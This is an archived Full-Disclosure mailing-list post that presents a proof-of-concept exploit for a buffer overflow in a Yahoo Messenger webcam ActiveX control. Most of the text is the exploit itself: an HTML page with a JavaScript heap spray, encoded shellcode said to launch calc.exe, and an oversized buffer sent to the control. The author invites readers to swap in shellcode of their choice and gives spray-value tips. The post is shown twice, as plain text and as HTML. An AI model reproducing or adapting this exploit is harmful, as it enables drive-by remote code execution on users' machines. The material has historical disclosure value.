Yahoo Messenger Buffer Overflows in Webcam ActiveX Controls Let Remote Users Execute Arbitrary Code

--===============2054051769==
Content-Type: multipart/alternative; boundary="0-1587020138-1181170222=:42658"
Content-Transfer-Encoding: 8bit

--0-1587020138-1181170222=:42658
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

<html>
<!--
45 minutes of fuzzing!
Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!
 
link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
maybe more vulz!
 
Greetz to: str0ke and shinnai!
-->
<html>
<script>
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");    
bigblock = unescape("%u9090%u9090"); 
headersize = 20; 
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock; 
fillblock = bigblock.substring(0, slackspace); 
block = bigblock.substring(0, bigblock.length-slackspace); 
while(block.length+slackspace<0x40000) block = block+block+fillblock; 
memory = new Array(); 
for (x=0; xi<800; x++) memory[x] = block + shellcode; 
var buffer = '\x0a'; 
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a'; 
target.server = buffer; 
target.initialize(); 
target.send(); 
</script>
</html>
sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111
       
---------------------------------
Luggage? GPS? Comic books? 
Check out fitting  gifts for grads at Yahoo! Search.
--0-1587020138-1181170222=:42658
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

&lt;html&gt;<BR>&lt;!--<BR>45 minutes of fuzzing!<BR>Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!<BR>&nbsp;<BR>link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856<BR>maybe
 more vulz!<BR>&nbsp;<BR>Greetz to: str0ke and shinnai!<BR>--&gt;<BR>&lt;html&gt;<BR>&lt;script&gt;<BR>&lt;object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277'
 id='target'<BR>shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +<BR>"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55"
 +<BR>"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +<BR>"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +<BR>"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D"
 +<BR>"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +<BR>"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +<BR>"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40"
 +<BR>"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6"
 +<BR>"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + <BR>"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +<BR>"%uCC4A%uD0FF");&nbsp;&nbsp;&nbsp;
 <BR>bigblock = unescape("%u9090%u9090"); <BR>headersize = 20; <BR>slackspace = headersize+shellcode.length<BR>while (bigblock.length&lt;slackspace)
 bigblock+=bigblock; <BR>fillblock = bigblock.substring(0, slackspace); <BR>block = bigblock.substring(0, bigblock.length-slackspace);
 <BR>while(block.length+slackspace&lt;0x40000) block = block+block+fillblock; <BR>memory = new Array(); <BR>for (x=0; xi&lt;800; x++)
 memory[x] = block + shellcode; <BR>var buffer = '\x0a'; <BR>while (buffer.length &lt; 5000) buffer+='\x0a\x0a\x0a\x0a'; <BR>target.server
 = buffer; <BR>target.initialize(); <BR>target.send(); <BR>&lt;/script&gt;<BR>&lt;/html&gt;<BR>sometimes 0a0a0a0a0a is not as good
 as 0d0d0d0d or 11111111<p>&#32;
      <hr size=1>Luggage? GPS? Comic books? <br>
Check out fitting <a href="http://us.rd.yahoo.com/evt=48249/*http://search.yahoo.com/search?fr=oni_on_mail&p=graduation+gifts&cs=bz">
 gifts for grads</a> at Yahoo! Search.
--0-1587020138-1181170222=:42658--


--===============2054051769==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============2054051769==--

Go to the Top of This SecurityTracker Archive Page